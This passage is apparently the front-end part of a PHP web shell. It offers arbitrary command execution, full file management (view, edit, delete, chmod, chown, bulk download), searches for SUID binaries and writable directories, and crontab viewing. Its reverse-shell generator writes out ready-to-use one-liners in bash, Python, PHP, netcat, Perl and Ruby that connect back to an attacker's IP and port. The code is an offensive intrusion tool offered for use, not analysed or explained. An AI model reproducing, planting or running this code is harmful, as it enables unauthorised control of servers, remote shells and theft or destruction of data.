                    <label>Your IP Address</label>
                    <input type="text" id="revshellIP" value="<?php echo $_SERVER['REMOTE_ADDR'] ?? ''; ?>">
                </div>
                <div class="form-group">
                    <label>Your Port</label>
                    <input type="number" id="revshellPort" value="4444">
                </div>
                <div class="form-group">
                    <label>Shell Type</label>
                    <select id="revshellType" onchange="generateRevShell()">
                        <option value="bash">Bash</option>
                        <option value="python">Python</option>
                        <option value="php">PHP</option>
                        <option value="nc">Netcat</option>
                        <option value="perl">Perl</option>
                        <option value="ruby">Ruby</option>
                    </select>
                </div>
                <button onclick="generateRevShell()">Generate</button>
                <button onclick="copyRevShell()">Copy to Clipboard</button>
                <div class="revshell-code" id="revshellCode"></div>
            </div>
        </div>
    </div>

    <!-- Tools Output Modal -->
    <div id="toolsModal" class="modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3 id="toolsTitle">Tool Output</h3>
                <button class="close-btn" onclick="closeToolsModal()">&times;</button>
            </div>
            <div class="modal-body">
                <div class="output" id="toolsOutput"></div>
            </div>
        </div>
    </div>

    <script>
        let currentRenamePath = '';
        let currentEditPath = '';
        let currentChmodPath = '';
        let currentChownPath = '';
        let commandHistory = [];
        let navHistory = [];
        let navIndex = -1;
        
        // Initialize
        document.addEventListener('DOMContentLoaded', function() {
            const initialPath = getCurrentPath();
            if(initialPath) {
                navHistory.push(initialPath);
                navIndex = 0;
                updateNavButtons();
            }
            loadCommandHistory();
        });
        
        function getCurrentPath() {
            const breadcrumb = document.getElementById('breadcrumb');
            const items = breadcrumb.querySelectorAll('.breadcrumb-item');
            let path = '';
            items.forEach(item => {
                const text = item.textContent;
                if(text === '/') {
                    path = '/';
                } else {
                    path += (path === '/' ? '' : '/') + text;
                }
            });
            return path || '/';
        }
        
        function addToNavHistory(path) {
            // Remove any forward history
            navHistory = navHistory.slice(0, navIndex + 1);
            navHistory.push(path);
            navIndex++;
            updateNavButtons();
        }
        
        function navigateBack() {
            if(navIndex > 0) {
                navIndex--;
                const path = navHistory[navIndex];
                changeDir(btoa(path), true);
            }
        }
        
        function navigateForward() {
            if(navIndex < navHistory.length - 1) {
                navIndex++;
                const path = navHistory[navIndex];
                changeDir(btoa(path), true);
            }
        }
        
        function updateNavButtons() {
            document.getElementById('backBtn').disabled = navIndex <= 0;
            document.getElementById('forwardBtn').disabled = navIndex >= navHistory.length - 1;
        }
        
        function runCommand(e) {
            e.preventDefault();
            const cmd = document.getElementById('cmdInput').value;
            const output = document.getElementById('output');
            const loading = document.getElementById('loading');
            
            if(!cmd.trim()) return;
            
            // Add to history
            commandHistory.unshift(cmd);
            if(commandHistory.length > 50) commandHistory.pop();
            saveCommandHistory();
            updateHistoryDisplay();
            
            loading.style.display = 'block';
            output.textContent = 'Executing...';
            
            const formData = new FormData();
            formData.append('cmd', cmd);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.text())
            .then(data => {
                loading.style.display = 'none';
                output.textContent = data || '(no output)';
            })
            .catch(error => {
                loading.style.display = 'none';
                output.textContent = 'Error: ' + error;
            });
        }
        
        function saveCommandHistory() {
            localStorage.setItem('cmdHistory', JSON.stringify(commandHistory));
        }
        
        function loadCommandHistory() {
            const saved = localStorage.getItem('cmdHistory');
            if(saved) {
                commandHistory = JSON.parse(saved);
                updateHistoryDisplay();
            }
        }
        
        function updateHistoryDisplay() {
            const historyDiv = document.getElementById('commandHistory');
            historyDiv.innerHTML = '';
            commandHistory.forEach(cmd => {
                const item = document.createElement('div');
                item.className = 'history-item';
                item.textContent = cmd;
                item.onclick = () => {
                    document.getElementById('cmdInput').value = cmd;
                    toggleHistory();
                };
                historyDiv.appendChild(item);
            });
        }
        
        function toggleHistory() {
            const historyDiv = document.getElementById('commandHistory');
            historyDiv.style.display = historyDiv.style.display === 'none' ? 'block' : 'none';
        }
        
        function updateBreadcrumb(path) {
            const parts = path.split('/').filter(p => p);
            let breadcrumb = '<span class="breadcrumb-item" onclick="changeDir(\'' + btoa('/') + '\')">/</span>';
            
            if(parts.length > 0) {
                breadcrumb += '<span class="breadcrumb-separator">/</span>';
            }
            
            let currentPath = '';
            parts.forEach((part, i) => {
                currentPath += '/' + part;
                breadcrumb += '<span class="breadcrumb-item" onclick="changeDir(\'' + btoa(currentPath) + '\')">' + escapeHtml(part) + '</span>';
                if(i < parts.length - 1) {
                    breadcrumb += '<span class="breadcrumb-separator">/</span>';
                }
            });
            
            document.getElementById('breadcrumb').innerHTML = breadcrumb;
        }
        
        function changeDir(encodedPath, skipHistory = false) {
            const formData = new FormData();
            formData.append('listdir', encodedPath);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                updateBreadcrumb(data.cwd);
                
                if(!skipHistory) {
                    addToNavHistory(data.cwd);
                } else {
                    updateNavButtons();
                }
                
                let html = '';
                data.files.forEach(file => {
                    const icon = file.is_dir ? '📁' : '📄';
                    const cssClass = file.is_dir ? 'dir' : 'file';
                    const nameHtml = file.is_dir 
                        ? `<a onclick="changeDir('${file.path}')">${escapeHtml(file.name)}</a>`
                        : escapeHtml(file.name);
                    
                    let actions = '';
                    let checkbox = '';
                    if(file.name === '..') {
                        actions = '-';
                    } else {
                        checkbox = `<input type="checkbox" class="file-select" data-path="${file.path}" onchange="updateSelection()">`;
                        if(file.is_dir) {
                            actions = `<a onclick="downloadDirectory('${file.path}', '${escapeHtml(file.name).replace(/'/g, "\\'")}')">ZIP</a>`;
                        } else {
                            actions = `<a onclick="viewFile('${file.path}')">View</a>
                                      <a onclick="editFile('${file.path}')">Edit</a>
                                      <a onclick="downloadFile('${file.path}')">DL</a>`;
                        }
                        actions += `<a onclick="renameFile('${file.path}', '${escapeHtml(file.name).replace(/'/g, "\\'")}')">Rename</a>
                                   <a class="delete-link" onclick="deleteFile('${file.path}', '${escapeHtml(file.name).replace(/'/g, "\\'")}')">Del</a>`;
                    }
                    
                    html += `
                        <tr>
                            <td>${checkbox}</td>
                            <td class="${cssClass}">
                                <span class="icon">${icon}</span>
                                ${nameHtml}
                            </td>
                            <td>${file.size}</td>
                            <td>${file.mtime}</td>
                            <td><a onclick="showChmod('${file.path}', '${file.perms}')">${file.perms}</a></td>
                            <td><a onclick="showChown('${file.path}', '${escapeHtml(file.owner).replace(/'/g, "\\'")}')">${escapeHtml(file.owner)}</a></td>
                            <td class="actions">${actions}</td>
                        </tr>
                    `;
                });
                
                document.getElementById('fileList').innerHTML = html;
                clearSelection();
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function toggleSelectAll() {
            const selectAll = document.getElementById('selectAll');
            const checkboxes = document.querySelectorAll('.file-select');
            checkboxes.forEach(cb => cb.checked = selectAll.checked);
            updateSelection();
        }
        
        function updateSelection() {
            const checkboxes = document.querySelectorAll('.file-select:checked');
            const count = checkboxes.length;
            document.getElementById('selectedCount').textContent = count + ' selected';
            document.getElementById('massActions').classList.toggle('active', count > 0);
        }
        
        function clearSelection() {
            document.getElementById('selectAll').checked = false;
            document.querySelectorAll('.file-select').forEach(cb => cb.checked = false);
            updateSelection();
        }
        
        function massDownload() {
            const checkboxes = document.querySelectorAll('.file-select:checked');
            if(checkboxes.length === 0) {
                alert('No files selected');
                return;
            }
            
            const paths = Array.from(checkboxes).map(cb => cb.dataset.path);
            
            const form = document.createElement('form');
            form.method = 'POST';
            form.action = '';
            
            const input = document.createElement('input');
            input.type = 'hidden';
            input.name = 'mass_download';
            input.value = '1';
            
            const pathsInput = document.createElement('input');
            pathsInput.type = 'hidden';
            pathsInput.name = 'paths';
            pathsInput.value = JSON.stringify(paths);
            
            form.appendChild(input);
            form.appendChild(pathsInput);
            document.body.appendChild(form);
            form.submit();
            document.body.removeChild(form);
        }
        
        function massDelete() {
            const checkboxes = document.querySelectorAll('.file-select:checked');
            if(checkboxes.length === 0) {
                alert('No files selected');
                return;
            }
            
            if(!confirm('Delete ' + checkboxes.length + ' selected items?')) {
                return;
            }
            
            const paths = Array.from(checkboxes).map(cb => cb.dataset.path);
            
            const formData = new FormData();
            formData.append('mass_delete', '1');
            formData.append('paths', JSON.stringify(paths));
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                let message = `Deleted: ${data.success}, Failed: ${data.failed}`;
                if(data.messages.length > 0) {
                    message += '\n\n' + data.messages.join('\n');
                }
                alert(message);
                
                // Refresh directory
                const breadcrumb = document.getElementById('breadcrumb');
                const lastItem = breadcrumb.querySelector('.breadcrumb-item:last-child');
                if(lastItem) lastItem.click();
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function showChmod(encodedPath, currentPerms) {
            currentChmodPath = encodedPath;
            document.getElementById('chmodInput').value = currentPerms;
            document.getElementById('chmodModal').style.display = 'block';
            document.getElementById('chmodInput').focus();
        }
        
        function closeChmodModal() {
            document.getElementById('chmodModal').style.display = 'none';
            currentChmodPath = '';
        }
        
        function confirmChmod() {
            const perms = document.getElementById('chmodInput').value.trim();
            if(!perms.match(/^[0-7]{3,4}$/)) {
                alert('Invalid permissions format. Use octal notation (e.g., 0755)');
                return;
            }
            
            const formData = new FormData();
            formData.append('chmod', currentChmodPath);
            formData.append('perms', perms);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                alert(data.message);
                closeChmodModal();
                if(data.success) {
                    const breadcrumb = document.getElementById('breadcrumb');
                    const lastItem = breadcrumb.querySelector('.breadcrumb-item:last-child');
                    if(lastItem) lastItem.click();
                }
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function showChown(encodedPath, currentOwner) {
            currentChownPath = encodedPath;
            document.getElementById('chownInput').value = currentOwner;
            document.getElementById('chownModal').style.display = 'block';
            document.getElementById('chownInput').focus();
        }
        
        function closeChownModal() {
            document.getElementById('chownModal').style.display = 'none';
            currentChownPath = '';
        }
        
        function confirmChown() {
            const owner = document.getElementById('chownInput').value.trim();
            if(!owner) {
                alert('Please enter an owner');
                return;
            }
            
            const formData = new FormData();
            formData.append('chown', currentChownPath);
            formData.append('owner', owner);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                alert(data.message);
                closeChownModal();
                if(data.success) {
                    const breadcrumb = document.getElementById('breadcrumb');
                    const lastItem = breadcrumb.querySelector('.breadcrumb-item:last-child');
                    if(lastItem) lastItem.click();
                }
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function showPhpInfo() {
            const form = document.createElement('form');
            form.method = 'POST';
            form.action = '';
            form.target = '_blank';
            
            const input = document.createElement('input');
            input.type = 'hidden';
            input.name = 'phpinfo';
            input.value = '1';
            
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
            document.body.removeChild(form);
        }
        
        function showRevShell() {
            document.getElementById('revshellModal').style.display = 'block';
            generateRevShell();
        }
        
        function closeRevShell() {
            document.getElementById('revshellModal').style.display = 'none';
        }
        
        function generateRevShell() {
            const ip = document.getElementById('revshellIP').value;
            const port = document.getElementById('revshellPort').value;
            const type = document.getElementById('revshellType').value;
            
            let code = '';
            
            switch(type) {
                case 'bash':
                    code = `bash -i >& /dev/tcp/${ip}/${port} 0>&1`;
                    break;
                case 'python':
                    code = `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`;
                    break;
                case 'php':
                    code = `php -r '$sock=fsockopen("${ip}",${port});exec("/bin/sh -i <&3 >&3 2>&3");'`;
                    break;
                case 'nc':
                    code = `nc -e /bin/sh ${ip} ${port}`;
                    break;
                case 'perl':
                    code = `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`;
                    break;
                case 'ruby':
                    code = `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'`;
                    break;
            }
            
            document.getElementById('revshellCode').textContent = code;
        }
        
        function copyRevShell() {
            const code = document.getElementById('revshellCode').textContent;
            navigator.clipboard.writeText(code).then(() => {
                alert('Copied to clipboard!');
            }).catch(err => {
                alert('Failed to copy: ' + err);
            });
        }
        
        function findSUID() {
            document.getElementById('toolsTitle').textContent = '🔍 SUID Binaries';
            document.getElementById('toolsOutput').textContent = 'Searching...';
            document.getElementById('toolsModal').style.display = 'block';
            
            const formData = new FormData();
            formData.append('find_suid', '1');
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.text())
            .then(data => {
                document.getElementById('toolsOutput').textContent = data || 'No SUID binaries found';
            })
            .catch(error => {
                document.getElementById('toolsOutput').textContent = 'Error: ' + error;
            });
        }
        
        function findWritable() {
            document.getElementById('toolsTitle').textContent = '📝 Writable Directories';
            document.getElementById('toolsOutput').textContent = 'Searching...';
            document.getElementById('toolsModal').style.display = 'block';
            
            const formData = new FormData();
            formData.append('find_writable', '1');
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.text())
            .then(data => {
                document.getElementById('toolsOutput').textContent = data || 'No writable directories found';
            })
            .catch(error => {
                document.getElementById('toolsOutput').textContent = 'Error: ' + error;
            });
        }
        
        function viewCron() {
            document.getElementById('toolsTitle').textContent = '⏰ Crontabs';
            document.getElementById('toolsOutput').textContent = 'Loading...';
            document.getElementById('toolsModal').style.display = 'block';
            
            const formData = new FormData();
            formData.append('view_cron', '1');
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.text())
            .then(data => {
                document.getElementById('toolsOutput').textContent = data || 'No crontabs found';
            })
            .catch(error => {
                document.getElementById('toolsOutput').textContent = 'Error: ' + error;
            });
        }
        
        function closeToolsModal() {
            document.getElementById('toolsModal').style.display = 'none';
        }
        
        function viewFile(encodedPath) {
            const formData = new FormData();
            formData.append('view', encodedPath);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                if(!data.success) {
                    alert(data.message || 'Failed to load file');
                    return;
                }
                
                document.getElementById('fileViewerTitle').textContent = '📄 ' + data.filename;
                const contentDiv = document.getElementById('fileViewerContent');
                
                if(data.is_php) {
                    const lines = data.content.split('\n');
                    let html = '<pre><code class="language-php">';
                    lines.forEach((line, i) => {
                        const lineNum = i + 1;
                        html += `<span class="line-numbers">${String(lineNum).padStart(4, ' ')}</span>${escapeHtml(line)}\n`;
                    });
                    html += '</code></pre>';
                    contentDiv.innerHTML = html;
                    hljs.highlightAll();
                } else {
                    const lines = data.content.split('\n');
                    const pre = document.createElement('pre');
                    pre.style.margin = '0';
                    pre.style.color = '#d4d4d4';
                    
                    lines.forEach((line, i) => {
                        const lineNum = i + 1;
                        const lineNumSpan = document.createElement('span');
                        lineNumSpan.className = 'line-numbers';
                        lineNumSpan.textContent = String(lineNum).padStart(4, ' ');
                        pre.appendChild(lineNumSpan);
                        
                        const lineText = document.createTextNode(line + '\n');
                        pre.appendChild(lineText);
                    });
                    
                    contentDiv.innerHTML = '';
                    contentDiv.appendChild(pre);
                }
                
                document.getElementById('fileViewerModal').style.display = 'block';
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function editFile(encodedPath) {
            const formData = new FormData();
            formData.append('edit', encodedPath);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                if(!data.success) {
                    alert(data.message || 'Failed to load file');
                    return;
                }
                
                currentEditPath = data.path;
                document.getElementById('fileEditorTitle').textContent = '✏️ ' + data.filename;
                document.getElementById('fileEditorContent').value = data.content;
                document.getElementById('saveStatus').textContent = '';
                document.getElementById('fileEditorModal').style.display = 'block';
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function saveFile() {
            if(!currentEditPath) {
                alert('No file is currently being edited');
                return;
            }
            
            const content = document.getElementById('fileEditorContent').value;
            const statusSpan = document.getElementById('saveStatus');
            
            statusSpan.textContent = 'Saving...';
            
            const formData = new FormData();
            formData.append('save', currentEditPath);
            formData.append('content', content);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                if(data.success) {
                    statusSpan.textContent = '✓ ' + data.message;
                    setTimeout(() => {
                        statusSpan.textContent = '';
                    }, 3000);
                } else {
                    statusSpan.textContent = '✗ ' + data.message;
                    statusSpan.style.color = '#f48771';
                    setTimeout(() => {
                        statusSpan.style.color = '#4ec9b0';
                        statusSpan.textContent = '';
                    }, 5000);
                }
            })
            .catch(error => {
                statusSpan.textContent = '✗ Error: ' + error;
                statusSpan.style.color = '#f48771';
            });
        }
        
        function closeFileViewer() {
            document.getElementById('fileViewerModal').style.display = 'none';
        }
        
        function closeFileEditor() {
            if(document.getElementById('fileEditorContent').value !== '' && 
               !confirm('Close editor? Any unsaved changes will be lost.')) {
                return;
            }
            document.getElementById('fileEditorModal').style.display = 'none';
            currentEditPath = '';
        }
        
        function downloadFile(encodedPath) {
            const form = document.createElement('form');
            form.method = 'POST';
            form.action = '';
            
            const input = document.createElement('input');
            input.type = 'hidden';
            input.name = 'download';
            input.value = encodedPath;
            
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
            document.body.removeChild(form);
        }
        
        function downloadDirectory(encodedPath, dirname) {
            if(!confirm('Create ZIP archive of "' + dirname + '"? This may take a while for large directories.')) {
                return;
            }
            
            const formData = new FormData();
            formData.append('downloaddir', encodedPath);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                if(data.success) {
                    alert(data.message + '\nDownloading: ' + data.zipname);
                    downloadFile(data.zippath);
                } else {
                    alert('Failed to create ZIP: ' + data.message);
                }
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function deleteFile(encodedPath, filename) {
            if(!confirm('Are you sure you want to delete "' + filename + '"?')) {
                return;
            }
            
            const formData = new FormData();
            formData.append('delete', encodedPath);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                alert(data.message);
                if(data.success) {
                    const breadcrumb = document.getElementById('breadcrumb');
                    const lastItem = breadcrumb.querySelector('.breadcrumb-item:last-child');
                    if(lastItem) lastItem.click();
                }
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function renameFile(encodedPath, currentName) {
            currentRenamePath = encodedPath;
            document.getElementById('renameInput').value = currentName;
            document.getElementById('renameModal').style.display = 'block';
            document.getElementById('renameInput').focus();
        }
        
        function closeRenameModal() {
            document.getElementById('renameModal').style.display = 'none';
            currentRenamePath = '';
        }
        
        function confirmRename() {
            const newName = document.getElementById('renameInput').value.trim();
            if(!newName) {
                alert('Please enter a new name');
                return;
            }
            
            const formData = new FormData();
            formData.append('rename', currentRenamePath);
            formData.append('newname', newName);
            
            fetch('', {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => {
                alert(data.message);
                closeRenameModal();
                if(data.success) {
                    const breadcrumb = document.getElementById('breadcrumb');
                    const lastItem = breadcrumb.querySelector('.breadcrumb-item:last-child');
                    if(lastItem) lastItem.click();
                }
            })
            .catch(error => {
                alert('Error: ' + error);
            });
        }
        
        function escapeHtml(text) {
            const div = document.createElement('div');
            div.textContent = text;
            return div.innerHTML;
        }
        
        // Close modals when clicking outside
        window.onclick = function(event) {
            if (event.target.classList.contains('modal')) {
                if(event.target.id === 'fileEditorModal') {
                    closeFileEditor();
                } else {
                    event.target.style.display = 'none';
                }
            }
        }
        
        // Close modals with ESC key
        document.addEventListener('keydown', function(event) {
            if (event.key === 'Escape') {
                closeFileViewer();
                closeFileEditor();
                closeRenameModal();
                closeChmodModal();
                closeChownModal();
                closeRevShell();
                closeToolsModal();
            }
        });
        
        // Ctrl+S to save in editor
        document.getElementById('fileEditorContent').addEventListener('keydown', function(event) {
            if ((event.ctrlKey || event.metaKey) && event.key === 's') {
                event.preventDefault();
                saveFile();
            }
        });
    </script>
</body>
</html>
